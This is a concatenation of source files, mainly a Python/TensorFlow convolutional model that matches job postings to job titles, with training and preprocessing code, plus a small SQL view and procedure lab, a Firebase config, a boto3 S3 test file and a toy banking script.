# out_tensor: batch_size x num_class x num_filters
out_tensor = tf.concat(axis=1, values=pooled_outputs_r_wclasses)
pooled_outputs_r.append(out_tensor)
# Combine all the pooled features
num_filters_total = num_filters * len(filter_sizes)
print("DEBUG: pooled_outputs_u -> %s" % pooled_outputs_u)
self.h_pool_u = tf.concat(axis=2, values=pooled_outputs_u)
print("DEBUG: h_pool_u -> %s" % self.h_pool_u)
# batch_size x 1 x num_filters_total
#self.h_pool_flat_u = tf.reshape(self.h_pool_u, [-1, 1, num_filters_total])
self.h_pool_flat_u = self.h_pool_u
print("DEBUG: h_pool_flat_u -> %s" % self.h_pool_flat_u)
print("DEBUG: pooled_outputs_r -> %s" % pooled_outputs_r)
self.h_pool_r = tf.concat(axis=2, values=pooled_outputs_r)
print("DEBUG: h_pool_r -> %s" % self.h_pool_r)
# h_pool_flat_r: batch_size x num_classes X num_filters_total
#self.h_pool_flat_r = tf.reshape(self.h_pool_r, [-1, num_classes, num_filters_total])
self.h_pool_flat_r = self.h_pool_r
print("DEBUG: h_pool_flat_r -> %s" % self.h_pool_flat_r)
# Add dropout layer to avoid overfitting
with tf.name_scope("dropout"):
self.h_features = tf.concat(axis=1, values=[self.h_pool_flat_u, self.h_pool_flat_r])
print("DEBUG: h_features -> %s" % self.h_features)
self.h_features_dropped = tf.nn.dropout(self.h_features,
self.dropout_keep_prob,
noise_shape=[tf.shape(self.h_pool_flat_r)[0], 1, num_filters_total])
self.h_dropped_u = self.h_features_dropped[:, :1, :]
self.h_dropped_r = self.h_features_dropped[:, 1:, :]
# cosine layer - final scores and predictions
with tf.name_scope("cosine_layer"):
self.dot = tf.reduce_sum(tf.multiply(self.h_dropped_u,
self.h_dropped_r), 2)
print("DEBUG: dot -> %s" % self.dot)
self.sqrt_u = tf.sqrt(tf.reduce_sum(self.h_dropped_u**2, 2))
print("DEBUG: sqrt_u -> %s" % self.sqrt_u)
self.sqrt_r = tf.sqrt(tf.reduce_sum(self.h_dropped_r**2, 2))
print("DEBUG: sqrt_r -> %s" % self.sqrt_r)
epsilon = 1e-5
self.cosine = tf.maximum(self.dot / (tf.maximum(self.sqrt_u * self.sqrt_r, epsilon)), epsilon)
print("DEBUG: cosine -> %s" % self.cosine)
self.predictions = tf.argmax(self.cosine, 1, name="predictions")
print("DEBUG: predictions -> %s" % self.predictions)
# softmax regression - loss and prediction
with tf.name_scope("loss"):
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=100*self.cosine, labels=self.input_y)
self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss
# Calculate Accuracy
with tf.name_scope("accuracy"):
correct_predictions = tf.equal(self.predictions, self.input_y)
self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")<file_sep>import tensorflow as tf
import os
import sys
sys.path.append(os.path.normpath(os.path.join(os.path.abspath(__file__), "../../")))
import training.sent_cnn_model.config as config
import preprocessing.sent_cnn_data_helpers as dh
import numpy as np
def format_data_for_testing(job_post, titles, max_len=50):
"""
Prepare the test set for the network.
"""
# Preprocess data
titles = [dh.clean_custom(x).split() for x in titles]
job_post = dh.clean_custom(job_post).split()
job_post = job_post[:max_len]
# Pad sentences
x_u = [dh.pad_sentences(job_post, max_len)]
x_r = [[dh.pad_sentences(x, max_len) for x in titles]]
# Load tokens and pretrained embeddings
we_file = "/".join(config.config["word_embeddings_file"].split("/")[1:])
voc_size = config.config["vocabulary_size"]
embedding_size = config.config["embedding_size"]
tokens, U = dh.get_pretrained_wordvec_from_file(we_file, (voc_size, embedding_size))
# Represent sentences as list(nparray) of ints
dctize = lambda word: tokens[word] if tokens.has_key(word) else tokens["pad"]
dctizes = lambda words: map(dctize, words)
dctizess = lambda wordss: map(dctizes, wordss)
x_u_i = np.array(map(dctizes, x_u))
x_r_i = np.array(map(dctizess, x_r))
return (x_u_i, x_r_i, max_len, U)
CHECKPOINT_DIR = "/home/pierre/Documents/Upwork/Code/job-knowledge-extraction/training/sent_cnn_model/runs/1514285552/checkpoints/"
# TODO freeze model.
with tf.Session() as sess:
saver = tf.train.import_meta_graph(os.path.join(CHECKPOINT_DIR, "sent_cnn_3_8-200.meta"))
saver.restore(sess, tf.train.latest_checkpoint(CHECKPOINT_DIR))
print "Model has been restored"
job_post = "ameria closed joint stock company is seeking a person to provide secretarial and administrative support to the office lobby"
titles = ["Factory Worker", "Chief Financial Officer" ,"receptionist", "Software Developer", "Chief Accountant/ Finance Assistant", "UI Designer"]
graph = tf.get_default_graph()
max_len = graph.get_tensor_by_name("sequence_length:0")
max_len = sess.run(max_len)
x_u_i, x_r_i, max_len, U = format_data_for_testing(job_post, titles, max_len=max_len)
input_x_u = graph.get_tensor_by_name("input_x_u:0")
input_x_r = graph.get_tensor_by_name("input_x_r:0")
dropout_keep_prob = graph.get_tensor_by_name("dropout_keep_prob:0")
predictions = graph.get_tensor_by_name("cosine_layer/predictions:0")
y = sess.run(predictions, feed_dict={input_x_u: x_u_i, input_x_r: x_r_i, dropout_keep_prob: 1})
print y<file_sep># Sent_CNN
This is the DSSM version based on Word Embeddings and Convolutional Layers.
### I Prepare the Dataset
Download the Kaggle job post dataset [here](https://www.kaggle.com/madhab/jobposts/downloads/online-job-postings.zip) and save it into the `data` folder.
Download the pretrained word embeddings [here](https://worksheets.codalab.org/rest/bundles/0x15a09c8f74f94a20bec0b68a2e6703b3/contents/blob/) and save them into the folder `data/word_representations` with the name `glove.6B.100d.txt`
Run `sent_cnn_data_helpers.py`, which will execute the `job_posting_data_preprocessing` function. This will create your formatted dataset in the `data` folder as `job_post_preprocessed.tsv`
``` sh
cd {ROOT_DIR}/preprocessing
python sent_cnn_data_helpers.py
```
### II Train
To train the network run:
``` sh
cd {ROOT_DIR}/training/sent_cnn_model
python train_cnn.py
```
Sometimes we observe instability during training for some datasets. If this happens, you can try changing the input dataset by varying the number
of words kept per job post (here 50). Taking all the words or 50 words looks stable, whereas taking 100 words is unstable.
``` python
job_description = " ".join(np_data[index][0].split()[:50])
```
You can monitor your training with TensorBoard by running:
``` sh
tensorboard --logdir runs/{YOURUNNUMBER}
```
> You can also run this on the question/topics dataset which is giving really good results (>92% accuracy on the validation set). You can download it [here](https://raw.githubusercontent.com/scottyih/STAGG/master/webquestions.examples.train.e2e.top10.filter.patrel.sid.tsv)<file_sep>import numpy as np
import re
import os
import sys
sys.path.append(os.path.normpath(os.path.join(os.path.abspath(__file__), "../../")))
import training.sent_cnn_model.config as config
def get_evaluation_examples_for_sent2vec(training_file_name, n_neg_sample=5):
neg_dict = {}
wqn_lst = []
x_u = []
x_r = []
y = []
with open(training_file_name) as tf:
for lines in tf:
# data -> [f1, u_str, r_str, WQ_NUM]
data = lines.split('\t')
f1 = float(data[0])
u_str = clean_str(data[1].strip())
r_str = data[2].strip()
wqn = data[3].strip()
if f1 >= 0.5:
wqn_lst.append(wqn)
x_u.append(u_str)
x_r.append([r_str])
else:
if neg_dict.has_key(wqn):
if len(neg_dict[wqn]) < n_neg_sample:
neg_dict[wqn].append(r_str)
else:
neg_dict[wqn] = [r_str]
for i in range(len(x_u)):
if not neg_dict.has_key(wqn_lst[i]):
neg_dict[wqn_lst[i]] = neg_dict[wqn_lst[0]]
if len(neg_dict[wqn_lst[i]]) < n_neg_sample:
neg_dict[wqn_lst[i]] += neg_dict[wqn_lst[0]][:n_neg_sample - len(neg_dict[wqn_lst[i]])]
if len(neg_dict[wqn_lst[i]]) != n_neg_sample:
print neg_dict[wqn_lst[i]]
x_r[i] = x_r[i] + neg_dict[wqn_lst[i]]
# add a little randomness
y.append(np.random.randint(len(x_r[i])))
tmp = x_r[i][0]
x_r[i][0] = x_r[i][y[i]]
x_r[i][y[i]] = tmp
with open("sent2vec.eval", 'w') as f:
for i, xu in enumerate(x_u):
for xr in x_r[i]:
line = ""
line = xu + '\t' + re.sub(r"\.", " ", xr) + '\n'
f.write(line)
return x_u, x_r, y
def get_training_examples(training_file_name, n_neg=5000):
"""
Load training data file, and split the data into words and labels.
Return utterances, relation words,
labels and the largest length of training sentences.
"""
positive_utterances = []
positive_relations = []
negative_utterances = []
negative_relations = []
max_len = 0
with open(training_file_name) as tf:
for lines in tf:
# data -> [f1, u_str, r_str, WQ_NUM]
data = lines.split('\t')
f1 = float(data[0])
u_str = clean_str(data[1].strip()).split(" ")
r_str = clean_str(data[2].strip()).split(" ")
max_len = max(len(u_str), len(r_str), max_len)
if f1 >= 0.5:
positive_utterances.append(u_str)
positive_relations.append(r_str)
elif f1 == 0:
negative_utterances.append(u_str)
negative_relations.append(r_str)
samples = np.random.choice(len(negative_utterances), n_neg, replace=False)
negative_utterances = [negative_utterances[i] for i in samples]
negative_relations = [negative_relations[i] for i in samples]
x_u = positive_utterances + negative_utterances
x_r = positive_relations + negative_relations
positive_labels = np.ones(len(positive_utterances))
negative_labels = np.zeros(len(negative_utterances))
y = np.concatenate((positive_labels, negative_labels))
return (x_u, x_r, y, max_len)
def get_training_examples_for_softmax(training_file_name, n_neg_sample=5, double_net=False):
"""
Load training data file, and split the data into words and labels.
Return utterances, relation words,
labels and the largest length of training sentences.
The output of this function is formatted for softmax regression.
"""
neg_dict = {}
max_len = 0
max_len_u = 0
max_len_r = 0
wqn_lst = []
x_u = [] # Question
x_r = [] # [[[topics2], [topicspos2].. etc]]
y = [] # [id_of_the_good_topic_sequence]
with open(training_file_name) as tf:
for lines in tf:
# data -> [f1, u_str, r_str, WQ_NUM]
data = lines.split('\t')
f1 = float(data[0])
u_str = clean_str(data[1].strip()).split(" ")
r_str = clean_str(data[2].strip()).split(" ")
wqn = data[3].strip()
max_len = max(len(u_str), len(r_str), max_len)
max_len_u = max(len(u_str), max_len_u)
max_len_r = max(len(r_str), max_len_r)
if f1 >= 0.5:
wqn_lst.append(wqn)
x_u.append(u_str)
x_r.append([r_str])
else:
if neg_dict.has_key(wqn):
if len(neg_dict[wqn]) < n_neg_sample:
neg_dict[wqn].append(r_str)
else:
neg_dict[wqn] = [r_str]
for i in range(len(x_u)):
if not neg_dict.has_key(wqn_lst[i]):
neg_dict[wqn_lst[i]] = neg_dict[wqn_lst[0]]
if len(neg_dict[wqn_lst[i]]) < n_neg_sample:
# TODO: Add some randomness to this selection process
neg_dict[wqn_lst[i]] += neg_dict[wqn_lst[0]][:n_neg_sample - len(neg_dict[wqn_lst[i]])]
if len(neg_dict[wqn_lst[i]]) != n_neg_sample:
print neg_dict[wqn_lst[i]]
x_r[i] = x_r[i] + neg_dict[wqn_lst[i]]
# add a little randomness
y.append(np.random.randint(len(x_r[i])))
tmp = x_r[i][0]
x_r[i][0] = x_r[i][y[i]]
x_r[i][y[i]] = tmp
if double_net:
return (x_u, x_r, y, max_len_u, max_len_r)
return (x_u, x_r, y, max_len)
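The label-shuffling step at the end (placing the positive relation at a random index and recording that index as the label) can be sketched in isolation; the candidate strings below are hypothetical:

```python
import random

# The positive relation is stored first, mirroring how x_r is built above.
candidates = ["correct_title", "neg1", "neg2", "neg3"]

# Pick a random slot, swap the positive into it, and record the slot as the label.
label = random.randrange(len(candidates))
candidates[0], candidates[label] = candidates[label], candidates[0]

assert candidates[label] == "correct_title"
```

Without this shuffle the correct answer would always sit at index 0, and the network could learn the position instead of the content.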
def clean_str(string):
"""
Tokenization/string cleaning for all datasets except for SST.
Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py
"""
string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
string = re.sub(r"\'s", " \'s", string)
string = re.sub(r"\'ve", " \'ve", string)
string = re.sub(r"n\'t", " n\'t", string)
string = re.sub(r"\'re", " \'re", string)
string = re.sub(r"\'d", " \'d", string)
string = re.sub(r"\'ll", " \'ll", string)
string = re.sub(r",", " , ", string)
string = re.sub(r"!", " ! ", string)
string = re.sub(r"\(", " \( ", string)
string = re.sub(r"\)", " \) ", string)
string = re.sub(r"\?", " \? ", string)
string = re.sub(r"\s{2,}", " ", string)
return string.strip().lower()
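For intuition, here is roughly what the cleaning rules do to a sample sentence (a condensed, self-contained copy of a few of the substitutions above, not the full function):

```python
import re

def clean_str_demo(string):
    # A condensed version of the substitutions in clean_str above.
    string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)  # drop other symbols
    string = re.sub(r"n\'t", " n\'t", string)               # split negations
    string = re.sub(r",", " , ", string)                    # isolate punctuation
    string = re.sub(r"!", " ! ", string)
    string = re.sub(r"\s{2,}", " ", string)                 # collapse whitespace
    return string.strip().lower()

assert clean_str_demo("I don't like it, really!") == "i do n't like it , really !"
```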
def pad_sentences(sentence, length, padding_word="pad"):
"""
Pad a sentence to a given length.
"""
num_padding = length - len(sentence)
new_sentence = sentence + [padding_word] * num_padding
return new_sentence
def get_pretrained_wordvec_from_file(wf, dim):
"""
Get the pre-trained word representations from local file(s).
@param wf: path to the file
@type wf: str
@param dim: the dimension of embedding matrix.
@type dim: tuple
@return (tokens, U): tokens row dict and words embedding matrix.
@rtype : tuple of (dict, nparray)
"""
tokens = {}
U = np.zeros(dim)
with open(wf) as f:
for inc, lines in enumerate(f):
tokens[lines.split()[0]] = inc
U[inc] = np.array(map(float, lines.split()[1:]))
if inc == dim[0]:
break
return tokens, U
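The loader above assumes GloVe's plain-text layout, one token per line followed by its vector components. A self-contained sketch of the same parsing logic on made-up data:

```python
import numpy as np

# Two made-up 3-dimensional embeddings in GloVe's text layout: "token v1 v2 v3".
fake_lines = ["the 0.1 0.2 0.3", "pad 0.0 0.0 0.0"]

tokens = {}
U = np.zeros((2, 3))
for row, line in enumerate(fake_lines):
    parts = line.split()
    tokens[parts[0]] = row                                # token -> row index
    U[row] = np.array([float(v) for v in parts[1:]])      # embedding vector

assert tokens["pad"] == 1
assert U[tokens["the"]][2] == 0.3
```

The resulting `tokens` dict and `U` matrix are exactly what the rest of the pipeline uses to map words to embedding rows.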
import pandas as pd
import random
def clean_custom(to_process):
to_process = to_process.lower()
to_process = to_process.replace("\n", " ") # take off \n at the end of line
to_process = re.sub(r'[^\w\s]', ' ', to_process) # replace punctuation with ' '
to_process = "".join([c for c in to_process if (c.isalnum() or c == " ")]) # take off all non alnum char
to_process = " ".join(to_process.split()) # Remove multiple spaces and rejoin with single spaces
return to_process
def job_posting_data_preprocessing(input_file_path):
data = pd.read_csv(input_file_path)
data = data[["JobDescription", "Title"]]
print data.count()
data = data.dropna(axis=0, how='any')
print data.count()
np_data = data.as_matrix()
with open(os.path.join(os.path.dirname(input_file_path), "job_post_preprocessed.tsv"), "w") as f:
for index in range(np_data.shape[0]):
# Cutting job post after max_length words (Simple case for now see the config file)
title = np_data[index][1]
title = clean_custom(title).replace(" ", ".")
job_description = clean_custom(np_data[index][0])
job_description = " ".join(job_description.split()[:config.config["max_len"]]) if config.config["max_len"] is not None else " ".join(job_description.split())
random_sampling = []
while len(random_sampling) != 10 or index in random_sampling or len(set(random_sampling)) != 10:
random_sampling = [random.randrange(0, np_data.shape[0]) for x in range(10)]
random_sampling = [clean_custom(np_data[x][1]).replace(" ", ".") for x in random_sampling]
random_sampling = zip([title] + random_sampling, [1] + [0]* 10)
random.shuffle(random_sampling)
[f.write(str(x[1]) + "\t" + job_description + "\t" + x[0] + "\t" + "WebQTrn-{}".format(index) + "\n") for x in random_sampling]
if index % 1000 == 0:
print "Processing {} of {} examples".format(index, np_data.shape[0])
if __name__ == "__main__":
# tokens, U = get_pretrained_wordvec_from_file("./data/word_representations/glove.6B.100d.txt", (400000, 100))
job_posting_data_preprocessing("../data/data job posts.csv")<file_sep>scipy==1.0.0
numpy==1.13.3
pandas==0.21.1
scikit-learn==0.19.1
<file_sep>import numpy as np
import tensorflow as tf
import datetime
import time
import os
import sys
sys.path.append(os.path.normpath(os.path.join(os.path.abspath(__file__), "../../../")))
import preprocessing.sent_cnn_data_helpers as dh
import double_net_sent_cnn
import sent_cnn
import config
def load_data(config):
"""
Load training examples and pretrained word embeddings from disk.
Return training inputs, labels and pretrained embeddings.
"""
# Load raw data
wq_file = config["data_file"]
n_neg_sample = config["num_classes"] - 1
x_u, x_r, y, max_len = dh.get_training_examples_for_softmax(wq_file, n_neg_sample)
# Pad sentences
pad = lambda x: dh.pad_sentences(x, max_len)
pad_lst = lambda x: map(pad, x)
x_u = map(pad, x_u)
x_r = map(pad_lst, x_r)
# Load tokens and pretrained embeddings
we_file = config["word_embeddings_file"]
voc_size = config["vocabulary_size"]
embedding_size = config["embedding_size"]
tokens, U = dh.get_pretrained_wordvec_from_file(we_file, (voc_size, embedding_size))
# Represent sentences as list(nparray) of ints
dctize = lambda word: tokens[word] if tokens.has_key(word) else tokens["pad"]
dctizes = lambda words: map(dctize, words)
dctizess = lambda wordss: map(dctizes, wordss)
x_u_i = np.array(map(dctizes, x_u))
x_r_i = np.array(map(dctizess, x_r))
y = np.array(y)
return (x_u_i, x_r_i, y, max_len, U)
def load_data_double_net(config):
"""
Load training examples and pretrained word embeddings from disk.
Return training inputs, labels and pretrianed embeddings.
"""
# Load raw data
wq_file = config["data_file"]
n_neg_sample = config["num_classes"] - 1
x_u, x_r, y, max_len_u, max_len_r = dh.get_training_examples_for_softmax(wq_file, n_neg_sample, double_net=True)
# Pad sentences
x_u = [dh.pad_sentences(x, max_len_u) for x in x_u]
x_r = [[dh.pad_sentences(u, max_len_r) for u in x] for x in x_r]
# Load tokens and pretrained embeddings
we_file = config["word_embeddings_file"]
voc_size = config["vocabulary_size"]
embedding_size = config["embedding_size"]
tokens, U = dh.get_pretrained_wordvec_from_file(we_file, (voc_size, embedding_size))
# Represent sentences as list(nparray) of ints
dctize = lambda word: tokens[word] if word in tokens else tokens["pad"]
dctizes = lambda words: map(dctize, words)
dctizess = lambda wordss: map(dctizes, wordss)
x_u_i = np.array(map(dctizes, x_u))
x_r_i = np.array(map(dctizess, x_r))
y = np.array(y)
return (x_u_i, x_r_i, y, {"max_len_u": max_len_u, "max_len_r": max_len_r}, U)
def train_cnn(x_u_i, x_r_i, y, max_len, U, config, debug=True):
if config["double_net"]:
cnn = double_net_sent_cnn.SentCNN(doc_sequence_length=max_len["max_len_u"],
query_sequence_length=max_len["max_len_r"],
num_classes=config["num_classes"],
init_embeddings=U,
filter_sizes=config["filter_sizes"],
num_filters=config["num_filters"],
batch_size=config["batch_size"],
embeddings_trainable=config["embeddings_trainable"],
l2_reg_lambda=config["l2_reg_lambda"])
print "Training double_net_sent_cnn..."
else:
cnn = sent_cnn.SentCNN(sequence_length=max_len,
num_classes=config["num_classes"],
init_embeddings=U,
filter_sizes=config["filter_sizes"],
num_filters=config["num_filters"],
batch_size=config["batch_size"],
embeddings_trainable=config["embeddings_trainable"],
l2_reg_lambda=config["l2_reg_lambda"])
print "Training classic sent_cnn..."
total_iter = config["total_iter"]
batch_size = config["batch_size"]
global_step = tf.Variable(0, name="global_step", trainable=False)  # step counter must not be optimized
optimizer = tf.train.AdamOptimizer()
grads_and_vars = optimizer.compute_gradients(cnn.loss)
# Gradient clipping is currently disabled; re-enable by mapping
# tf.clip_by_value(g, -55.0, 55.0) over grads_and_vars if training diverges.
capped_gvs = grads_and_vars
train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step)
val_size = config["val_size"]
x_u_val = x_u_i[:val_size]
x_u_train = x_u_i[val_size:]  # val_size+1 would silently drop one example
x_r_val = x_r_i[:val_size]
x_r_train = x_r_i[val_size:]
y_val = y[:val_size]
y_train = y[val_size:]
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# summary
#grad_summaries = []
#for g, v in grads_and_vars:
# if g is not None:
# grad_hist_summary = tf.histogram_summary("{}/grad/hist".format(v.name), g)
# sparsity_summary = tf.scalar_summary("{}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
# grad_summaries.append(grad_hist_summary)
# grad_summaries.append(sparsity_summary)
#grad_summaries_merged = tf.merge_summary(grad_summaries)
# Output directory for models and summaries
timestamp = str(int(time.time()))
out_dir = os.path.abspath(os.path.join(os.path.curdir, "runs", timestamp))
print("Writing to {}\n".format(out_dir))
# Summaries for loss and accuracy
loss_summary = tf.summary.scalar("loss", cnn.loss)
acc_summary = tf.summary.scalar("accuracy", cnn.accuracy)
# Train Summaries
train_summary_op = tf.summary.merge([loss_summary, acc_summary])
train_summary_dir = os.path.join(out_dir, "summaries", "train")
train_summary_writer = tf.summary.FileWriter(train_summary_dir, sess.graph)
# Dev summaries
dev_summary_op = tf.summary.merge([loss_summary, acc_summary])
dev_summary_dir = os.path.join(out_dir, "summaries", "dev")
dev_summary_writer = tf.summary.FileWriter(dev_summary_dir, sess.graph)
# Checkpoint directory. Tensorflow assumes this directory already exists so we need to create it
if debug==False:
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "sent_cnn")
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
saver = tf.train.Saver()
for _ in range(total_iter):
indices = np.random.choice(len(x_u_train), batch_size)
x_u_batch = x_u_train[indices]
x_r_batch = x_r_train[indices]
y_batch = y_train[indices]
# Training procedures
feed_dict = {
cnn.input_x_u: x_u_batch,
cnn.input_x_r: x_r_batch,
cnn.input_y: y_batch,
cnn.dropout_keep_prob:config["dropout_keep_prob"]
}
if debug == False:
_, step, summaries, loss, accuracy, u, r, dot, su, sr, cosine = sess.run(
[train_op, global_step, train_summary_op, cnn.loss, cnn.accuracy, cnn.h_dropped_u,
cnn.h_dropped_r, cnn.dot, cnn.sqrt_u, cnn.sqrt_r, cnn.cosine], feed_dict)
else:
_, step, loss, accuracy, u, r, dot, su, sr, cosine, undropped = sess.run(
[train_op, global_step, cnn.loss, cnn.accuracy, cnn.h_dropped_u,
cnn.h_dropped_r, cnn.dot, cnn.sqrt_u, cnn.sqrt_r, cnn.cosine, cnn.h_features], feed_dict)
gvs = sess.run([gv[0] if gv[0] is not None else cnn.loss for gv in capped_gvs], feed_dict)
time_str = datetime.datetime.now().isoformat()
if debug == False:
train_summary_writer.add_summary(summaries, step)
if step != 0 and step % 50 == 0:
feed_dict = {
cnn.input_x_u: x_u_val,
cnn.input_x_r: x_r_val,
cnn.input_y: y_val,
cnn.dropout_keep_prob:1
}
if debug == False:
dev_loss, dev_accuracy, summaries = sess.run(
[cnn.loss, cnn.accuracy, train_summary_op], feed_dict)
else:
dev_loss, dev_accuracy = sess.run(
[cnn.loss, cnn.accuracy], feed_dict)
print("{}: step {}, train loss {:g}, train acc {:g}, dev loss {:g}, dev acc {:g}".format(
time_str, step, loss, accuracy, dev_loss, dev_accuracy))
#print gvs
'''print undropped
print "----------------------------------"
print u
print "----------------------------------"
print r
print "----------------------------------"
print dot
print "----------------------------------"
print su
print "----------------------------------"
print sr
print "----------------------------------"
print cosine'''
if debug == False:
if dev_summary_writer:
dev_summary_writer.add_summary(summaries, step)
# Saving checkpoints. TODO: save the meta file only once.
if step != 0 and step % config["checkpoint_step"] == 0:
checkpoint_name = checkpoint_prefix + "_{}_{}".format(len(config["filter_sizes"]), config["num_filters"])
saver.save(sess, checkpoint_name, global_step=step)
if __name__=="__main__":
if not config.config["double_net"]:
# Load Data for sent_cnn
x_u_i, x_r_i, y, max_len, U = load_data(config.config)
else:
# Load Data for double_net_sent_cnn
x_u_i, x_r_i, y, max_len, U = load_data_double_net(config.config)
train_cnn(x_u_i, x_r_i, y, max_len, U, config.config, debug=False)<file_sep># job-knowledge-extraction
There are three main modules:
- preprocessing: classes and methods for data pre-processing (e.g., implement word2vec to generate lookup tables).
- training: main classes and methods for training the model.
- testing: unit tests and validation methods.
<file_sep>config = {
"data_file": "../../data/job_post_preprocessed.tsv",
"word_embeddings_file": "../../data/word_representations/glove.6B.100d.txt",
"vocabulary_size": 400000,
"embedding_size": 100,
"num_classes": 6,
"filter_sizes": [5],
"num_filters": 200, # Ideally 256 to 1000
"dropout_keep_prob": 0.85,
"embeddings_trainable": True,
"total_iter": 100000,
"batch_size": 256,
"val_size": 1000,
"l2_reg_lambda": 0.1,
"checkpoint_step": 300,
"max_len": 50,
"double_net": True
}
|
6f3aa3bc57ee2f9d692bd58426bf47ceb22b76f9
|
[
"Markdown",
"Python",
"Text"
] | 8 |
Python
|
upwork-ds/job-knowledge-extraction
|
d31cdeff8d3a100569f93faf9c8512093b3390a3
|
7ec0192f201177dd932be0d5ce7ccf15542ae64e
|
refs/heads/master
|
<repo_name>phobologic/stacker-python-bug-squash<file_sep>/requirements.txt
botocore
boto3
testfixtures
formic
nose
<file_sep>/lambda_hook/tests/test_lambda.py
import unittest
from StringIO import StringIO
from zipfile import ZipFile
import botocore
from botocore.stub import Stubber
import boto3
from testfixtures import TempDirectory, compare
from .. import aws_lambda
REGION = "us-east-1"
ALL_FILES = (
'f1/f1.py',
'f1/f1.pyc',
'f1/__init__.py',
'f1/test/__init__.py',
'f1/test/f1.py',
'f1/test/f1.pyc',
'f1/test2/test.txt',
'f2/f2.js'
)
F1_FILES = [p[3:] for p in ALL_FILES if p.startswith('f1')]
F2_FILES = [p[3:] for p in ALL_FILES if p.startswith('f2')]
BUCKET_NAME = "myBucket"
class TestLambdaHooks(unittest.TestCase):
def setUp(self):
self.s3 = boto3.client("s3")
self.stubber = Stubber(self.s3)
@classmethod
def temp_directory_with_files(cls, files=ALL_FILES):
d = TempDirectory()
for f in files:
d.write(f, '')
return d
def assert_zip_file_list(self, zip_file, files):
found_files = set()
for zip_info in zip_file.infolist():
perms = (
zip_info.external_attr & aws_lambda.ZIP_PERMS_MASK
) >> 16
self.assertIn(perms, (0755, 0644),
'ZIP member permission must be 755 or 644')
found_files.add(zip_info.filename)
compare(found_files, set(files))
def assert_s3_zip_file_list(self, bucket, key, files):
object_info = self.s3.get_object(Bucket=bucket, Key=key)
zip_data = StringIO(object_info['Body'].read())
with ZipFile(zip_data, 'r') as zip_file:
self.assert_zip_file_list(zip_file, files)
def test_ensure_bucket_bucket_exists(self):
self.stubber.add_response("head_bucket", {})
with self.stubber:
aws_lambda._ensure_bucket(self.s3, BUCKET_NAME)
def test_ensure_bucket_bucket_doesnt_exist_create_ok(self):
self.stubber.add_client_error(
"head_bucket",
service_error_code="404",
http_status_code="404"
)
self.stubber.add_response(
"create_bucket",
{"Location": "/%s" % BUCKET_NAME}
)
with self.stubber:
aws_lambda._ensure_bucket(self.s3, BUCKET_NAME)
def test_ensure_bucket_bucket_doesnt_exist_access_denied(self):
self.stubber.add_client_error(
"head_bucket",
service_error_code="401",
http_status_code="401"
)
with self.stubber:
with self.assertRaises(botocore.exceptions.ClientError):
aws_lambda._ensure_bucket(self.s3, BUCKET_NAME)
def test_ensure_bucket_unhandled_error(self):
self.stubber.add_client_error(
"head_bucket",
service_error_code="500",
http_status_code="500"
)
with self.stubber:
with self.assertRaises(botocore.exceptions.ClientError) as cm:
aws_lambda._ensure_bucket(self.s3, BUCKET_NAME)
exc = cm.exception
self.assertEquals(exc.response["Error"]["Code"], "500")
if __name__ == "__main__":
unittest.main()
|
3c184a68d55c1b6903b732f80a59a2e3e1c26673
|
[
"Python",
"Text"
] | 2 |
Text
|
phobologic/stacker-python-bug-squash
|
f9b226efb018c1942ccc1e674c42f474db7f105e
|
11fa02e95b69bc4ab9c56b3a809612da0423489b
|
refs/heads/master
|
<file_sep>use missamore;
# Write a query that returns the company_id, company name, the number of resumes submitted
# to that company, the average gpa of the resumes they submitted, and the number of people
# that were hired.
# Save the query as a VIEW named company_resume_statistics.
create or replace view company_resume_statistics as
select c.company_id, c.company_name, COUNT(rc.resume_id) AS resume_count, avg_company_gpa(c.company_name) AS avg_gpa
from resume_company rc
join company c ON rc.company_id=c.company_id
GROUP BY c.company_id;
#3 Create a stored procedure that uses the VIEW, takes in a company id as its only input and
# returns the information for the given company.
DROP PROCEDURE IF EXISTS company_id_statistics;
DELIMITER //
CREATE PROCEDURE company_id_statistics (_company_id varchar(255))
BEGIN
SELECT * FROM company_resume_statistics where company_id = _company_id;
END //
DELIMITER ;
# CALLS THE PROCEDURE
CALL company_id_statistics(1);
#Create a stored procedure that uses the VIEW and returns companies who have an average gpa
#greater than or equal to the input value.
DROP PROCEDURE IF EXISTS company_avg_gpa;
DELIMITER //
CREATE PROCEDURE company_avg_gpa (_avg_gpa int)
BEGIN
SELECT * FROM company_resume_statistics where avg_company_gpa(company_name) >= _avg_gpa;
END //
DELIMITER ;
#CALLS THE FUNCTION
call company_avg_gpa(3);
|
f12d62d5db054abe80ad50285bd1245217c4f230
|
[
"SQL"
] | 1 |
SQL
|
joemissamore/lab09
|
43dff7495e00867b265ba81cfa4d1f9dbf8a33d5
|
bf384dddee5c2633d88c1b78ac72a39378769e68
|
refs/heads/master
|
<repo_name>omargobran/NewsFly-ReactNative-App<file_sep>/config.js
export const firebaseConfig = {
apiKey: "<KEY>",
authDomain: "my-new-project-111.firebaseapp.com",
databaseURL: "https://my-new-project-111.firebaseio.com/",
projectId: "my-new-project-111",
storageBucket: "my-new-project-111.appspot.com",
messagingSenderId: "161293357263",
appId: "1:161293357263:web:579fe0262a03f8db"
};
|
a679d4f39cc696b5b5bf08352f6d5a3168d7a6f6
|
[
"JavaScript"
] | 1 |
JavaScript
|
omargobran/NewsFly-ReactNative-App
|
2dbba8932b1db4eff62c249698fc0e7e3228f200
|
7de43d77255ded4feefb8bbbfec4a337bd988a32
|
refs/heads/master
|
<file_sep>from utils import header
from open_file_bank import open_file_bank,write_money_slips
def main():
header()
make_money_slips()
def make_money_slips():
file=open_file_bank('w')
write_money_slips(file)
file.close()
main()
<file_sep>import os
from bank_account_variables import accounts_list,money_slips
def open_file_bank(mode):
BASE_PATH=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
return open(BASE_PATH+'/files/_bank_file.dat',mode)
def write_money_slips(file):
for money_bill,value in money_slips.items():
file.write(money_bill+'='+str(value)+';')
def read_money_slips(file):
line=file.readline()
